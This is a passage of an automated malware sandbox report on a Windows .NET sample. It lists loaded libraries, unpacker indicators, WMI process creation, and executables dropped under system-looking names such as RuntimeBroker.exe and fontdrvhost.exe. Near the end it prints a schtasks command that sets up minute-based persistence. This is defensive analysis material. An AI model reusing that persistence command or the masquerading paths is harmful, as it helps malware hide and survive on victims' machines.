                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: winmmbase.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: mmdevapi.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: devobj.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: ksuser.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: avrt.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: audioses.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: umpdc.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: msacm32.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: midimap.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: windowscodecs.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: mscoree.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: version.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: wldp.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: profapi.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: mscoree.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: apphelp.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: version.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: uxtheme.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: windows.storage.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: wldp.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: profapi.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: cryptsp.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: rsaenh.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: cryptbase.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: mscoree.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: version.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: uxtheme.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: windows.storage.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: wldp.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: profapi.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: cryptsp.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: rsaenh.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: cryptbase.dll
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: apphelp.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: wldp.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: profapi.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: sspicli.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: wldp.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: profapi.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeDirectory created: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeDirectory created: C:\Program Files\Windows NT\TableTextService\en-US\5b884080fd4f94Jump to behavior
                            Source: dmhu7oz5yP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: dmhu7oz5yP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Data Obfuscation

                            barindex
                            .NET source code contains potential unpacker
                            Source: dmhu7oz5yP.exe, 78v.cs.Net Code: _9jF
                            Source: dmhu7oz5yP.exe, Ba5.cs.Net Code: _1G1 System.AppDomain.Load(byte[])
                            Source: dmhu7oz5yP.exe, Ba5.cs.Net Code: _1G1 System.Reflection.Assembly.Load(byte[])
                            Source: dmhu7oz5yP.exe, Ba5.cs.Net Code: _1G1
                            Source: WinStore.App.exe.0.dr, 78v.cs.Net Code: _9jF
                            Source: WinStore.App.exe.0.dr, Ba5.cs.Net Code: _1G1 System.AppDomain.Load(byte[])
                            Source: WinStore.App.exe.0.dr, Ba5.cs.Net Code: _1G1 System.Reflection.Assembly.Load(byte[])
                            Source: WinStore.App.exe.0.dr, Ba5.cs.Net Code: _1G1
                            Source: RuntimeBroker.exe0.0.dr, 78v.cs.Net Code: _9jF
                            Source: RuntimeBroker.exe0.0.dr, Ba5.cs.Net Code: _1G1 System.AppDomain.Load(byte[])
                            Source: RuntimeBroker.exe0.0.dr, Ba5.cs.Net Code: _1G1 System.Reflection.Assembly.Load(byte[])
                            Source: RuntimeBroker.exe0.0.dr, Ba5.cs.Net Code: _1G1
                            Source: upfc.exe.0.dr, 78v.cs.Net Code: _9jF
                            Source: upfc.exe.0.dr, Ba5.cs.Net Code: _1G1 System.AppDomain.Load(byte[])
                            Source: upfc.exe.0.dr, Ba5.cs.Net Code: _1G1 System.Reflection.Assembly.Load(byte[])
                            Source: upfc.exe.0.dr, Ba5.cs.Net Code: _1G1
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeCode function: 19_2_00007FFD9B8AFBD5 push esp; ret 19_2_00007FFD9B8AFCE9
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeCode function: 19_2_00007FFD9B89FDC7 pushad ; ret 19_2_00007FFD9B89FDA9
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeCode function: 19_2_00007FFD9B89FCF6 pushad ; ret 19_2_00007FFD9B89FDA9
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeCode function: 19_2_00007FFD9B8AFC9F push esp; ret 19_2_00007FFD9B8AFCE9

                            Persistence and Installation Behavior

                            barindex
                            Creates processes via WMI
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Drops executables to the windows directory (C:\Windows) and starts them
                            Source: unknownExecutable created and started: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeJump to dropped file
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Users\Default\RuntimeBroker.exeJump to dropped file
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exeJump to dropped file
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeJump to dropped file
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exeJump to dropped file
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Users\Public\Libraries\RuntimeBroker.exeJump to dropped file
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Windows\Media\WinStore.App.exeJump to dropped file
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exeJump to dropped file
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeJump to dropped file
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Users\Default\RuntimeBroker.exeJump to dropped file
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeJump to dropped file
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exeJump to dropped file
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Windows\Media\WinStore.App.exeJump to dropped file
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exeJump to dropped file

                            Boot Survival

                            barindex
                            Drops PE files to the user root directory
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Users\Default\RuntimeBroker.exeJump to dropped file
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /f
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
